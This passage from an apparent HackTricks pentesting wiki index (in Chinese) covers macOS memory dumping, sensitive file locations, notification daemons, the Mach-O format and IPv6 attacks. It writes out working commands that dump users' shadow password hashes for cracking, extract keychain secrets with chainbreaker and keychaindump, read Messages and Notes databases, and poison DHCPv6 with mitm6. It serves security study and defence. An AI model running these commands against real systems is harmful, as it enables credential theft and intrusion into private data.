Binaries & Memory » macOS Installers Abuse » 空载荷","id":"2255","title":"空载荷"},"2256":{"body":"可以在包的 分发 xml 文件中添加 \\n\\n\\n\\n\\n\\n\\n\\n\\n#myapp.pkg\\n\\nEOF # Buil final\\nproductbuild --distribution dist.xml --package-path myapp.pkg final-installer.pkg","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 后门安装程序","id":"2257","title":"后门安装程序"},"2258":{"body":"DEF CON 27 - 解包 Pkgs 深入了解 Macos 安装包及常见安全漏洞 OBTS v4.0: \\"macOS 安装程序的奇妙世界\\" - Tony Lambert DEF CON 27 - 解包 Pkgs 深入了解 MacOS 安装包 https://redteamrecipe.com/macos-red-teaming?utm_source=pocket_shared#heading-exploiting-installer-packages tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Installers Abuse » 参考文献","id":"2258","title":"参考文献"},"2259":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » macOS 内存转储","id":"2259","title":"macOS 内存转储"},"226":{"body":"Windows网络通常依赖于 无状态DHCPv6 进行DNS,而不是SLAAC。 mitm6 自动回复Solicit消息,使用 广告 → 回复 流程,将 您的链路本地地址分配为DNS,持续300秒 。这解锁了: NTLM中继攻击(WPAD + DNS劫持) 拦截内部名称解析而不触及路由器 典型用法: bash sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning","breadcrumbs":"Pentesting Network » Pentesting IPv6 » DHCPv6 DNS欺骗 (mitm6)","id":"226","title":"DHCPv6 DNS欺骗 (mitm6)"},"2260":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 内存伪影","id":"2260","title":"内存伪影"},"2261":{"body":"交换文件,如 /private/var/vm/swapfile0,在 物理内存满时充当缓存 。当物理内存没有更多空间时,其数据会被转移到交换文件中,然后根据需要再带回物理内存。可能会存在多个交换文件,名称如 swapfile0、swapfile1 等。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 交换文件","id":"2261","title":"交换文件"},"2262":{"body":"位于 /private/var/vm/sleepimage 的文件在 休眠模式 下至关重要。 当 OS X 进入休眠时,内存中的数据会存储在此文件中 。唤醒计算机时,系统会从该文件中检索内存数据,使用户能够继续之前的工作。 值得注意的是,在现代 MacOS 系统上,此文件通常出于安全原因被加密,导致恢复变得困难。 要检查 sleepimage 是否启用加密,可以运行命令 sysctl vm.swapusage。这将显示文件是否被加密。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 休眠映像","id":"2262","title":"休眠映像"},"2263":{"body":"另一个与内存相关的重要文件是 内存压力日志 。这些日志位于 /var/log 中,包含有关系统内存使用情况和压力事件的详细信息。它们对于诊断与内存相关的问题或理解系统如何随时间管理内存特别有用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 内存压力日志","id":"2263","title":"内存压力日志"},"2264":{"body":"为了在 MacOS 机器上转储内存,可以使用 osxpmem 。 注意 :以下说明仅适用于具有 Intel 架构的 Mac。此工具现已归档,最后一次发布是在 2017 年。根据以下说明下载的二进制文件针对 Intel 芯片,因为在 2017 年时 Apple Silicon 尚未出现。可能可以为 arm64 架构编译二进制文件,但您需要自己尝试。 bash #Dump raw format\\nsudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem #Dump aff4 format\\nsudo 
osxpmem.app/osxpmem -o /tmp/dump_mem.aff4 如果您发现此错误:osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8) 您可以通过以下方式修复它: bash sudo cp -r osxpmem.app/MacPmem.kext \\"/tmp/\\"\\nsudo kextutil \\"/tmp/MacPmem.kext\\"\\n#Allow the kext in \\"Security & Privacy --> General\\"\\nsudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem 其他错误 可能通过 允许加载kext 在“安全性与隐私 --> 常规”中修复,只需 允许 它。 您还可以使用此 单行命令 下载应用程序,加载kext并转储内存: bash sudo su\\ncd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem 注意:该单行命令以 root 身份从网络下载一个 2017 年的第三方内核扩展并直接加载,既没有校验归档的哈希,也没有核对 kext 的签名;执行前请先核对下载文件的校验和。另外,自 macOS 10.13 起第三方 kext 必须在“安全性与隐私”中由用户批准才能加载,在 Apple Silicon 上还需要先在恢复模式中降低安全策略并允许用户管理内核扩展;较新的系统已弃用 kextload/kextutil,通常需改用 kmutil load。取证场景下还应记录加载 kext 与转储操作本身对目标内存造成的改动。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Memory Dumping » 使用 osxpmem 转储内存","id":"2264","title":"使用 osxpmem 转储内存"},"2265":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » macOS 敏感位置与有趣的守护进程","id":"2265","title":"macOS 敏感位置与有趣的守护进程"},"2266":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 密码","id":"2266","title":"密码"},"2267":{"body":"隐藏密码与用户的配置一起存储在位于 /var/db/dslocal/nodes/Default/users/ 的 plist 文件中。 以下单行命令可用于转储 所有用户的信息 (包括哈希信息): bash for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r \\"$l\\" ];then echo \\"$l\\"; defaults read \\"$l\\"; fi; done 像这样的脚本 或 这个 可以用来将哈希转换为 hashcat 格式 。 一个替代的一行命令将以 hashcat 格式 -m 7100(macOS PBKDF2-SHA512)转储所有非服务账户的凭据: bash sudo bash -c \'for i in $(find /var/db/dslocal/nodes/Default/users -type f -regex \\"[^_]*\\"); do plutil -extract name.0 raw $i | awk \\"{printf \\\\$0\\\\\\":\\\\$ml\\\\$\\\\\\"}\\"; for j in {iterations,salt,entropy}; do l=$(k=$(plutil -extract ShadowHashData.0 raw $i) && base64 -d <<< $k | plutil -extract SALTED-SHA512-PBKDF2.$j raw -); if [[ $j == iterations ]]; then echo -n $l; else base64 -d <<< $l | xxd -p -c 0 | awk \\"{printf \\\\\\"$\\\\\\"\\\\$0}\\"; fi; done; echo \\"\\"; done\' 另一种获取用户 ShadowHashData 的方法是使用 dscl: sudo dscl . 
-read /Users/`whoami` ShadowHashData","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 隐藏密码","id":"2267","title":"隐藏密码"},"2268":{"body":"此文件 仅在 系统以 单用户模式 运行时使用(因此不太频繁)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » /etc/master.passwd","id":"2268","title":"/etc/master.passwd"},"2269":{"body":"请注意,当使用 security 二进制文件 解密并转储密码 时,会有几个提示要求用户允许此操作。 bash #security\\nsecurity dump-trust-settings [-s] [-d] #List certificates\\nsecurity list-keychains #List keychain dbs\\nsecurity list-smartcards #List smartcards\\nsecurity dump-keychain | grep -A 5 \\"keychain\\" | grep -v \\"version\\" #List keychains entries\\nsecurity dump-keychain -d #Dump all the info, included secrets (the user will be asked for his password, even if root)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Keychain Dump","id":"2269","title":"Keychain Dump"},"227":{"body":"在管理交换机上使用 RA Guard / DHCPv6 Guard / ND Inspection 。 端口 ACL 仅允许合法路由器的 MAC 发送 RAs。 监控 不稳定的高频率 RAs 或突然的 RDNSS 变化 。 在端点禁用 IPv6 是一种临时解决方法,通常会破坏现代服务并隐藏盲点 – 更倾向于使用 L2 过滤。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 防御","id":"227","title":"防御"},"2270":{"body":"caution 根据这个评论 juuso/keychaindump#10 (comment) ,这些工具在 Big Sur 中似乎不再有效。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Keychaindump","id":"2270","title":"Keychaindump"},"2271":{"body":"一个名为 keychaindump 的工具被开发出来以从 macOS 钥匙串中提取密码,但在像 Big Sur 这样的较新 macOS 版本上面临限制,如 讨论 所示。使用 keychaindump 需要攻击者获得访问权限并提升到 root 权限。该工具利用了钥匙串在用户登录时默认解锁的事实,以方便应用程序访问,而无需用户重复输入密码。然而,如果用户选择在每次使用后锁定他们的钥匙串, keychaindump 将变得无效。 Keychaindump 通过针对一个特定的进程 securityd 来操作,Apple 
将其描述为一个用于授权和加密操作的守护进程,对于访问钥匙串至关重要。提取过程涉及识别一个从用户登录密码派生的 Master Key 。这个密钥对于读取钥匙串文件是必不可少的。为了找到 Master Key , keychaindump 使用 vmmap 命令扫描 securityd 的内存堆,寻找标记为 MALLOC_TINY 的区域中的潜在密钥。以下命令用于检查这些内存位置: bash sudo vmmap | grep MALLOC_TINY 在识别潜在的主密钥后, keychaindump 在堆中搜索特定模式 (0x0000000000000018),这表明一个主密钥的候选者。进一步的步骤,包括去混淆,都是利用这个密钥所必需的,正如 keychaindump 的源代码中所概述的。专注于这一领域的分析师应注意,解密钥匙串的关键数据存储在 securityd 进程的内存中。运行 keychaindump 的示例命令是: bash sudo ./keychaindump","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Keychaindump 概述","id":"2271","title":"Keychaindump 概述"},"2272":{"body":"Chainbreaker 可用于以法医可靠的方式从 OSX 密钥链中提取以下类型的信息: 哈希密钥链密码,适合使用 hashcat 或 John the Ripper 破解 互联网密码 通用密码 私钥 公钥 X509 证书 安全笔记 Appleshare 密码 给定密钥链解锁密码、使用 volafox 或 volatility 获得的主密钥,或如 SystemKey 的解锁文件,Chainbreaker 还将提供明文密码。 如果没有这些解锁密钥链的方法,Chainbreaker 将显示所有其他可用信息。 Dump keychain keys bash #Dump all keys of the keychain (without the passwords)\\npython2.7 chainbreaker.py --dump-all /Library/Keychains/System.keychain 使用 SystemKey 转储钥匙串密钥(带密码) bash # First, get the keychain decryption key\\n# To get this decryption key you need to be root and SIP must be disabled\\nhexdump -s 8 -n 24 -e \'1/1 \\"%.2x\\"\' /var/db/SystemKey && echo\\n## Use the previous key to decrypt the passwords\\npython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain 转储钥匙串密钥(带密码)破解哈希 bash # Get the keychain hash\\npython2.7 chainbreaker.py --dump-keychain-password-hash /Library/Keychains/System.keychain\\n# Crack it with hashcat\\nhashcat.exe -m 23100 --keep-guessing hashes.txt dictionary.txt\\n# Use the key to decrypt the passwords\\npython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain 通过内存转储转储钥匙串密钥(带密码) 按照这些步骤 执行 内存转储 bash #Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords\\n# 
Unfortunately volafox isn\'t working with the latest versions of MacOS\\npython vol.py -i ~/Desktop/show/macosxml.mem -o keychaindump #Try to extract the passwords using the extracted keychain passwords\\npython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain 使用用户密码转储钥匙串密钥(包括密码) 如果您知道用户的密码,您可以使用它来 转储和解密属于该用户的钥匙串 。 bash #Prompt to ask for the password\\npython2.7 chainbreaker.py --dump-all --password-prompt /Users//Library/Keychains/login.keychain-db","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » chainbreaker","id":"2272","title":"chainbreaker"},"2273":{"body":"kcpassword 文件是一个保存 用户登录密码 的文件,但只有在系统所有者 启用自动登录 的情况下才会存在。 因此,用户将自动登录,而无需输入密码(这并不是很安全)。 密码存储在文件 /etc/kcpassword 中,使用密钥 0x7D 0x89 0x52 0x23 0xD2 0xBC 0xDD 0xEA 0xA3 0xB9 0x1F 进行异或混淆(这只是混淆,并非真正的加密)。 如果用户的密码长度超过密钥,密钥将被循环重复使用。 这使得密码相对容易恢复,例如使用像 这个 的脚本。注意该文件仅 root 可读,因此需要先获得 root 权限才能读取并还原密码;反过来,在加固检查中应确认自动登录已关闭且该文件不存在。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » kcpassword","id":"2273","title":"kcpassword"},"2274":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Interesting Information in Databases","id":"2274","title":"Interesting Information in Databases"},"2275":{"body":"注意:~/Library/Messages 受 TCC 保护,即使以 root 身份运行,调用进程(例如终端)也需要拥有“完全磁盘访问权限”才能打开 chat.db;如果 sqlite3 报错 unable to open database / authorization denied,通常就是 TCC 拒绝所致。Suggestions 数据库通常位于 ~/Library/Suggestions/ 之下,请按实际路径调整最后一条命令。 bash sqlite3 $HOME/Library/Messages/chat.db .tables\\nsqlite3 $HOME/Library/Messages/chat.db \'select * from message\'\\nsqlite3 $HOME/Library/Messages/chat.db \'select * from attachment\'\\nsqlite3 $HOME/Library/Messages/chat.db \'select * from deleted_messages\'\\nsqlite3 $HOME/Suggestions/snippets.db \'select * from emailSnippets\'","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Messages","id":"2275","title":"Messages"},"2276":{"body":"您可以在 $(getconf 
DARWIN_USER_DIR)/com.apple.notificationcenter/ 找到通知数据。 大多数有趣的信息将位于 blob 中。因此,您需要 提取 该内容并 转换 为 人类 可读 格式,或者使用 strings 。要访问它,您可以执行: bash cd $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/\\nstrings $(getconf DARWIN_USER_DIR)/com.apple.notificationcenter/db2/db | grep -i -A4 slack","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 通知","id":"2276","title":"通知"},"2277":{"body":"用户的 notes 可以在 ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite 找到(该目录受 TCC 保护,读取需要“完全磁盘访问权限”)。下面的示例把每条笔记的 ZDATA(压缩后的正文)写入临时文件再用 zcat 解压;注意示例中 writefile 写入的文件名是 body1.gz.z,而 zcat 读取的是 body1.gz.Z,这只在默认的大小写不敏感文件系统上碰巧可用,在大小写敏感的卷上会失败,请把两处文件名统一。 bash sqlite3 ~/Library/Group\\\\ Containers/group.com.apple.notes/NoteStore.sqlite .tables #To dump it in a readable format:\\nfor i in $(sqlite3 ~/Library/Group\\\\ Containers/group.com.apple.notes/NoteStore.sqlite \\"select Z_PK from ZICNOTEDATA;\\"); do sqlite3 ~/Library/Group\\\\ Containers/group.com.apple.notes/NoteStore.sqlite \\"select writefile(\'body1.gz.z\', ZDATA) from ZICNOTEDATA where Z_PK = \'$i\';\\"; zcat body1.gz.Z ; done","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Notes","id":"2277","title":"Notes"},"2278":{"body":"在 macOS 应用中,偏好设置位于 $HOME/Library/Preferences ,而在 iOS 中则位于 /var/mobile/Containers/Data/Application//Library/Preferences。 在 macOS 中,可以使用 cli 工具 defaults 来 修改偏好设置文件 。 /usr/sbin/cfprefsd 注册并提供 XPC 服务 com.apple.cfprefsd.daemon 和 com.apple.cfprefsd.agent,客户端可以通过它们执行诸如修改偏好设置等操作;这些 plist 中经常会保存令牌、最近打开的路径等敏感信息,值得在枚举阶段检查。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Preferences","id":"2278","title":"Preferences"},"2279":{"body":"文件 /System/Library/OpenDirectory/permissions.plist 包含应用于节点属性的权限,并受到 SIP 保护。 该文件通过 UUID(而不是 uid)授予特定用户权限,以便他们能够访问特定的敏感信息,如 ShadowHashData、HeimdalSRPKey 和 KerberosKeys 等。 xml 
[...]\\ndsRecTypeStandard:Computers\\n\\ndsAttrTypeNative:ShadowHashData\\n\\n\\n\\nuuid\\nABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000\\npermissions\\n\\nreadattr\\nwriteattr\\n\\n\\n\\ndsAttrTypeNative:KerberosKeys\\n\\n\\n\\nuuid\\nABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000\\npermissions\\n\\nreadattr\\nwriteattr\\n\\n\\n\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » OpenDirectory permissions.plist","id":"2279","title":"OpenDirectory permissions.plist"},"228":{"body":"许多消费级路由器在所有接口上暴露管理守护进程(HTTP(S)、SSH/Telnet、TR-069 等)。在某些部署中,“客户/公共”SSID 被桥接到 WAN/核心,并且仅支持 IPv6。即使路由器的 IPv6 在每次启动时都会变化,您仍然可以通过 NDP/ICMPv6 可靠地学习它,然后从客户 SSID 直接连接到管理平面。 从连接到客户/公共 SSID 的客户端的典型工作流程: 通过 ICMPv6 路由器请求发现路由器,发送到所有路由器的多播 ff02::2 并捕获路由器广告 (RA): bash # Listen for Router Advertisements (ICMPv6 type 134)\\nsudo tcpdump -vvv -i \'icmp6 and ip6[40]==134\' # Provoke an RA by sending a Router Solicitation to ff02::2\\npython3 - <<\'PY\'\\nfrom scapy.all import *\\nsend(IPv6(dst=\'ff02::2\')/ICMPv6ND_RS(), iface=\'\')\\nPY RA揭示了路由器的链路本地地址,通常还有一个全局地址/前缀。如果只知道链路本地地址,请记住连接必须指定区域索引,例如ssh -6 admin@[fe80::1%wlan0]。 替代方案:如果可用,请使用ndisc6套件: bash # rdisc6 sends RS and prints RAs in a friendly way\\nrdisc6 从访客SSID访问通过IPv6暴露的服务: bash # SSH/Telnet example (replace with discovered address)\\nssh -6 admin@[2001:db8:abcd::1]\\n# Web UI over IPv6\\ncurl -g -6 -k \'http://[2001:db8:abcd::1]/\'\\n# Fast IPv6 service sweep\\nnmap -6 -sS -Pn -p 22,23,80,443,7547 [2001:db8:abcd::1] 如果管理外壳通过包装器(例如,tcpdump)提供数据包捕获工具,请检查参数/文件名注入,以允许传递额外的 tcpdump 标志,如 -G/-W/-z,以实现后旋转命令执行。请参见: Wildcards Spare tricks 防御/注意事项: 不要将管理绑定到访客/公共桥接;在 SSID 桥接上应用 IPv6 防火墙。 在可行的情况下,对访客段进行 NDP/RS/RA 的速率限制和过滤。 对于必须可达的服务,强制实施身份验证/MFA 和强速率限制。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 客户/公共 SSID 上的 NDP 路由器发现和管理服务暴露","id":"228","title":"客户/公共 SSID 上的 NDP 路由器发现和管理服务暴露"},"2280":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, 
Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 系统通知","id":"2280","title":"系统通知"},"2281":{"body":"主要的通知守护进程是 /usr/sbin/notifyd 。为了接收通知,客户端必须通过 com.apple.system.notification_center Mach 端口进行注册(使用 sudo lsmp -p 检查它们)。该守护进程可以通过文件 /etc/notify.conf 进行配置。 用于通知的名称是唯一的反向 DNS 表示法,当向其中一个名称发送通知时,已指明可以处理该通知的客户端将接收到它。 可以通过向 notifyd 进程发送 SIGUSR2 信号并读取生成的文件 /var/run/notifyd_.status 来转储当前状态(并查看所有名称): bash ps -ef | grep -i notifyd\\n0 376 1 0 15Mar24 ?? 27:40.97 /usr/sbin/notifyd sudo kill -USR2 376 cat /var/run/notifyd_376.status\\n[...]\\npid: 94379 memory 5 plain 0 port 0 file 0 signal 0 event 0 common 10\\nmemory: com.apple.system.timezone\\ncommon: com.apple.analyticsd.running\\ncommon: com.apple.CFPreferences._domainsChangedExternally\\ncommon: com.apple.security.octagon.joined-with-bottle\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » Darwin 通知","id":"2281","title":"Darwin 通知"},"2282":{"body":"分布式通知中心 的主要二进制文件是**/usr/sbin/distnoted**,这是发送通知的另一种方式。它暴露了一些XPC服务,并执行一些检查以尝试验证客户端。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 分布式通知中心","id":"2282","title":"分布式通知中心"},"2283":{"body":"在这种情况下,应用程序可以注册 主题 。客户端将通过**apsd 联系苹果的服务器生成一个令牌。 然后,提供者也将生成一个令牌,并能够连接到苹果的服务器向客户端发送消息。这些消息将由 apsd**本地接收,并将通知转发给等待它的应用程序。 首选项位于/Library/Preferences/com.apple.apsd.plist。 在macOS中,消息的本地数据库位于/Library/Application\\\\ Support/ApplePushService/aps.db,在iOS中位于/var/mobile/Library/ApplePushService。它有3个表:incoming_messages、outgoing_messages和channel。 bash sudo sqlite3 /Library/Application\\\\ Support/ApplePushService/aps.db 也可以使用以下命令获取有关守护进程和连接的信息: bash /System/Library/PrivateFrameworks/ApplePushService.framework/apsctl status","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 苹果推送通知 
(APN)","id":"2283","title":"苹果推送通知 (APN)"},"2284":{"body":"这些是用户应该在屏幕上看到的通知: CFUserNotification :这个 API 提供了一种在屏幕上显示带有消息的弹出窗口的方法。 公告板 :这在 iOS 上显示一个会消失的横幅,并将存储在通知中心。 NSUserNotificationCenter :这是 MacOS 中的 iOS 公告板。通知的数据库位于 /var/folders//0/com.apple.notificationcenter/db2/db tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Sensitive Locations & Interesting Daemons » 用户通知","id":"2284","title":"用户通知"},"2285":{"body":"Reading time: 19 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » macOS Universal binaries & Mach-O Format","id":"2285","title":"macOS Universal binaries & Mach-O Format"},"2286":{"body":"Mac OS 二进制文件通常被编译为 universal binaries 。一个 universal binary 可以 在同一个文件中支持多个架构 。 这些二进制文件遵循 Mach-O 结构 ,基本由以下部分组成: 头部 加载命令 数据 https://alexdremov.me/content/images/2022/10/6XLCD.gif","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » 基本信息","id":"2286","title":"基本信息"},"2287":{"body":"使用以下命令搜索文件: mdfind fat.h | grep -i mach-o | grep -E \\"fat.h$\\" #define FAT_MAGIC\\t0xcafebabe\\n#define FAT_CIGAM\\t0xbebafeca\\t/* NXSwapLong(FAT_MAGIC) */ struct fat_header { uint32_t\\tmagic; /* FAT_MAGIC 或 FAT_MAGIC_64 */ uint32_t\\tnfat_arch;\\t/* 后续结构的数量 */\\n}; struct fat_arch {\\ncpu_type_t\\tcputype;\\t/* cpu 说明符 (int) */\\ncpu_subtype_t\\tcpusubtype;\\t/* 机器说明符 (int) */\\nuint32_t\\toffset; /* 文件偏移到此目标文件 */\\nuint32_t\\tsize; /* 此目标文件的大小 */\\nuint32_t\\talign; /* 以 2 的幂为单位的对齐 */\\n}; 头部包含 magic 字节,后面是文件 包含 的 archs 的 数量 (nfat_arch),每个架构将有一个 fat_arch 结构。 使用以下命令检查: % file /bin/ls\\n/bin/ls: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64e:Mach-O 64-bit executable arm64e]\\n/bin/ls (for architecture x86_64):\\tMach-O 64-bit executable x86_64\\n/bin/ls (for architecture arm64e):\\tMach-O 64-bit executable arm64e % otool -f -v /bin/ls\\nFat headers\\nfat_magic FAT_MAGIC\\nnfat_arch 2\\narchitecture x86_64 cputype CPU_TYPE_X86_64\\ncpusubtype CPU_SUBTYPE_X86_64_ALL\\ncapabilities 0x0 offset 16384 size 72896 align 2^14 (16384)\\narchitecture arm64e cputype CPU_TYPE_ARM64\\ncpusubtype CPU_SUBTYPE_ARM64E\\ncapabilities PTR_AUTH_VERSION USERSPACE 0 offset 98304 size 88816 align 2^14 (16384) 或者使用 Mach-O View 工具: 正如你所想,通常为 2 个架构编译的 universal 
binary 会使文件大小翻倍 ,而为 1 个架构编译的文件则不会。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Fat Header","id":"2287","title":"Fat Header"},"2288":{"body":"头部包含有关文件的基本信息,例如用于识别它为 Mach-O 文件的 magic 字节和有关目标架构的信息。你可以在以下路径找到它: mdfind loader.h | grep -i mach-o | grep -E \\"loader.h$\\" c #define\\tMH_MAGIC\\t0xfeedface\\t/* the mach magic number */\\n#define MH_CIGAM\\t0xcefaedfe\\t/* NXSwapInt(MH_MAGIC) */\\nstruct mach_header {\\nuint32_t\\tmagic; /* mach magic number identifier */\\ncpu_type_t\\tcputype;\\t/* cpu specifier (e.g. I386) */\\ncpu_subtype_t\\tcpusubtype;\\t/* machine specifier */\\nuint32_t\\tfiletype;\\t/* type of file (usage and alignment for the file) */\\nuint32_t\\tncmds; /* number of load commands */\\nuint32_t\\tsizeofcmds;\\t/* the size of all the load commands */\\nuint32_t\\tflags; /* flags */\\n}; #define MH_MAGIC_64 0xfeedfacf /* the 64-bit mach magic number */\\n#define MH_CIGAM_64 0xcffaedfe /* NXSwapInt(MH_MAGIC_64) */\\nstruct mach_header_64 {\\nuint32_t\\tmagic; /* mach magic number identifier */\\nint32_t cputype;\\t/* cpu specifier */\\nint32_t cpusubtype;\\t/* machine specifier */\\nuint32_t\\tfiletype;\\t/* type of file */\\nuint32_t\\tncmds; /* number of load commands */\\nuint32_t\\tsizeofcmds;\\t/* the size of all the load commands */\\nuint32_t\\tflags; /* flags */\\nuint32_t\\treserved;\\t/* reserved */\\n};","breadcrumbs":"macOS Security & Privilege Escalation » macOS Files, Folders, Binaries & Memory » macOS Universal binaries & Mach-O Format » Mach-O Header","id":"2288","title":"Mach-O Header"},"2289":{"body":"有不同的文件类型,可以在 源代码中找到定义,例如这里 。最重要的类型有: MH_OBJECT: 可重定位目标文件(编译的中间产品,尚未成为可执行文件)。 MH_EXECUTE: 